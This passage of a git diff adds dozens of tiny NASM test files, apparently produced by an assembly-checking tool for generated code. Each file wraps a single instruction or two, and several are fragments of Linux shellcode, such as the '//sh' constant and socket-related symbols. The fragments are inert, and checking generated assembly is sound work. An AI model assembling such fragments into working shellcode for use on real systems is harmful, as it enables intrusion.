+myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + push ebx + mov ebx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_148.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_148.obj new file mode 100644 index 0000000000000000000000000000000000000000..fcdf1fc000cce609effc311b3e871a1009509cd9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_148.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_149.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_149.asm new file mode 100644 index 0000000000000000000000000000000000000000..9cd030a790167c958cf59ef679c7fa005e38c309 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_149.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_149.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_149.obj new file mode 100644 index 0000000000000000000000000000000000000000..560351c870a22a3dc4877150cb006ceaf852faaa Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_149.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_15.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_15.asm new file mode 100644 index 0000000000000000000000000000000000000000..eaf279760f52e7a80e3ebdfb820700dd3f51c003 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_15.asm @@ -0,0 +1,13 @@ +section .data + +y equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, y + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_15.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_15.obj new file mode 100644 index 0000000000000000000000000000000000000000..1c12012400d0d1f33d4346029887c8068b9105ac Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_15.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_150.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_150.asm new file mode 100644 index 0000000000000000000000000000000000000000..5d6edcdae82cfd6a7a3e715e90030a1aabf43565 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_150.asm @@ -0,0 +1,14 @@ +section .data + +child equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, ebx + jne child + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_150.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_150.obj new file mode 100644 index 0000000000000000000000000000000000000000..9536505e168b6f47b372425212e56f1edc1376cb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_150.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_155.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_155.asm new file mode 100644 index 0000000000000000000000000000000000000000..bde78e2918644e558ee90ec437f06d95a8a00673 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_155.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop esi + mov edi, [esi] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_155.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_155.obj new file mode 100644 index 0000000000000000000000000000000000000000..136f9936981bd51fa92e46e3072846cbaef731ca Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_155.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_157.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_157.asm new file mode 100644 index 0000000000000000000000000000000000000000..49b23eed4d7402e0f88c4db555f1098289eb224e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_157.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 0x68732f2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_157.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_157.obj new file mode 100644 index 0000000000000000000000000000000000000000..2bb77ba140be7925703ea6fab99daa729813dbc4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_157.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_158.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_158.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_158.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_158.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_158.obj new file mode 100644 index 0000000000000000000000000000000000000000..fcf8446f9c59efae1784cb1902251f6a9513c8fe Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_158.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_163.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_163.asm new file mode 100644 index 0000000000000000000000000000000000000000..3bb94681250990341f2df38da8255daede556930 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_163.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _stage: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_163.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_163.obj new file mode 100644 index 0000000000000000000000000000000000000000..bd083297b121fcdb9027ae07dac011c0ad362481 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_163.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_167.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_167.asm new file mode 100644 index 0000000000000000000000000000000000000000..76c0a7c05083348506ba69a6d21b7db4487818da --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_167.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov dl, byte [esi] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_167.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_167.obj new file mode 100644 index 0000000000000000000000000000000000000000..716341e5c2e961d774010bbaea5a5f2d616f627a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_167.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_169.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_169.asm new file mode 100644 index 0000000000000000000000000000000000000000..d0082dc915e750bb771622ba8ac5812bf0855621 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_169.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, edi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_169.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_169.obj new file mode 100644 index 0000000000000000000000000000000000000000..3e64bee1a30396be115b2dbaa8c330570c83e558 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_169.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_176.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_176.asm new file mode 100644 index 0000000000000000000000000000000000000000..cdc50da4bca3168d4a8c23e136cdb8b3d7ade61b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_176.asm @@ -0,0 +1,14 @@ +section .data + +lowbound equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp BYTE [esi], 0x7 + jl lowbound + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_176.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_176.obj new file mode 100644 index 0000000000000000000000000000000000000000..9e0edbbb9b3f0ac6407a928d82c5cea61d0905c7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_176.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_18.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_18.asm new file mode 100644 index 0000000000000000000000000000000000000000..50c355b21004fdd0d6f3ecaaf2dfdd34dec36643 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_18.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + get_label: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_18.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_18.obj new file mode 100644 index 0000000000000000000000000000000000000000..942031e07c7076139dbf42d73ea580e6fe052bc2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_18.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_185.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_185.asm new file mode 100644 index 0000000000000000000000000000000000000000..2b9ad25b17fd4f2d46b66f1b732286eeab74440e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_185.asm @@ -0,0 +1,14 @@ +section .data + +af_inet equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push for + push af_inet + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_190.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_190.asm new file mode 100644 index 0000000000000000000000000000000000000000..341f1bddca5d9e54106c7678087c45256cdbe3e3 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_190.asm @@ -0,0 +1,13 @@ +section .data + +sockfd equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push sockfd + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_190.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_190.obj new file mode 100644 index 0000000000000000000000000000000000000000..4e4e41e12c99a5b6718b7718fb70f8a207bfec4a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_190.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_191.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_191.asm new file mode 100644 index 0000000000000000000000000000000000000000..4d21de0dd783a21ed7b69964a74d16baef0502ee --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_191.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + close_label: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_191.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_191.obj new file mode 100644 index 0000000000000000000000000000000000000000..165024c6d4f550a53272c0c526a883c308176ca3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_191.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_192.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_192.asm new file mode 100644 index 0000000000000000000000000000000000000000..4b1583fa45df559da813946fe52309feef97b0a1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_192.asm @@ -0,0 +1,15 @@ +section .data + +l1 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop ecx + dec ecx + jmp l1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_192.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_192.obj new file mode 100644 index 0000000000000000000000000000000000000000..bc9cc673826421c688a1b3ace2db7ad9b03323ce Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_192.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_196.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_196.asm new file mode 100644 index 0000000000000000000000000000000000000000..18b85381eca454f050e2d022bb77b990eb195114 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_196.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [eax], 0x1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_196.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_196.obj new file mode 100644 index 0000000000000000000000000000000000000000..f671910c8c70e83e101fa44e9660ff1adeab2d5f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_196.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_199.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_199.asm new file mode 100644 index 0000000000000000000000000000000000000000..1ee1ad8c48f29b648be329188cdd66e284121d46 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_199.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x978cd092 + pop edi + pop ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_199.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_199.obj new file mode 100644 index 0000000000000000000000000000000000000000..2fcabf9bef71e684dc93ad4ea9362f39d5b0c60e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_199.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_201.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_201.asm new file mode 100644 index 0000000000000000000000000000000000000000..a82e50c412f61c82ac3b0f15716b7fb323af2e5c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_201.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_201.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_201.obj new file mode 100644 index 0000000000000000000000000000000000000000..44f8106508f932555412547abf0d6681ee62d625 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_201.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_203.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_203.asm new file mode 100644 index 0000000000000000000000000000000000000000..29a1acff1a86409f6345e9d07b65e36df6174440 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_203.asm @@ -0,0 +1,14 @@ +section .data + +bucle equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + dec ecx + jns bucle + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_203.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_203.obj new file mode 100644 index 0000000000000000000000000000000000000000..d8965d9bd4521c421e4b0aa73cd8171240964bfb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_203.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_205.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_205.asm new file mode 100644 index 0000000000000000000000000000000000000000..e2314268a7b236c4b402eecd5ff05ac5cbd15590 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_205.asm @@ -0,0 +1,13 @@ +section .data + +_loop2 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jns _loop2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_205.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_205.obj new file mode 100644 index 0000000000000000000000000000000000000000..62d2b8f5138cc3af08bc3e50a65675e229308e98 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_205.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_212.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_212.asm new file mode 100644 index 0000000000000000000000000000000000000000..eee6507c3dd023b2fb01fcb58b91d91faf574ba2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_212.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, 0x11 + add dl, 0x5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_212.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_212.obj new file mode 100644 index 0000000000000000000000000000000000000000..b185133ad7f9cb367cb82246b3bcc772d511795b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_212.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_218.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_218.asm new file mode 100644 index 0000000000000000000000000000000000000000..071df6c3fe48b07349c9e3a9c68e44071f5aaef9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_218.asm @@ -0,0 +1,13 @@ +section .data + +var1 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [var1], 0x2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_218.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_218.obj new file mode 100644 index 0000000000000000000000000000000000000000..5c9131f0d59e2146486e55702b4c9da889cbaf4f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_218.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_219.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_219.asm new file mode 100644 index 0000000000000000000000000000000000000000..fe05becdcf8262dbe943f92b9bcd4d3219193852 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_219.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx, ebx + mul ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_219.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_219.obj new file mode 100644 index 0000000000000000000000000000000000000000..8f0d59d7dd39a776dfe308d5d1d3748fbf5ffbeb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_219.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_222.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_222.asm new file mode 100644 index 0000000000000000000000000000000000000000..a043ad94d1546d08d301b3e99d740e2798c7ead6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_222.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + xor ecx, ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_222.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_222.obj new file mode 100644 index 0000000000000000000000000000000000000000..a3465046fd08afd604ffdcbb674a57ee81c89bb6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_222.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_224.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_224.asm new file mode 100644 index 0000000000000000000000000000000000000000..7b115117ccb689f0e31dbee1b2f4d81f7fe8c72d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_224.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + function_5: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_224.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_224.obj new file mode 100644 index 0000000000000000000000000000000000000000..5ce262fb3f1e57909478ff2596362fa9ddeaa00d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_224.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_226.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_226.asm new file mode 100644 index 0000000000000000000000000000000000000000..f738a3482c3cd1fba06025eda9fa1020c0ce0010 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_226.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov esi, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_226.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_226.obj new file mode 100644 index 0000000000000000000000000000000000000000..d66b1a3a36f0776c578893baab37b9163f286778 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_226.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_228.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_228.asm new file mode 100644 index 0000000000000000000000000000000000000000..9cd030a790167c958cf59ef679c7fa005e38c309 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_228.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_228.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_228.obj new file mode 100644 index 0000000000000000000000000000000000000000..9ae7da893d4d40eeb7489f355c2241e7caad577c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_228.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_23.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_23.asm new file mode 100644 index 0000000000000000000000000000000000000000..a3ca32e9090fb04647f0d8d24d4864b6fccb1f1f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_23.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _zerod: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_23.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_23.obj new file mode 100644 index 0000000000000000000000000000000000000000..486fc5ce507f80cf62d6faac44ba74e4e446b29a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_23.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_230.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_230.asm new file mode 100644 index 0000000000000000000000000000000000000000..83ea13b74ead7ba2042599718ff9d9d2252f9077 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_230.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ecx, ecx + push ecx + jmp myExitAddr \ No newline at end of file diff --git 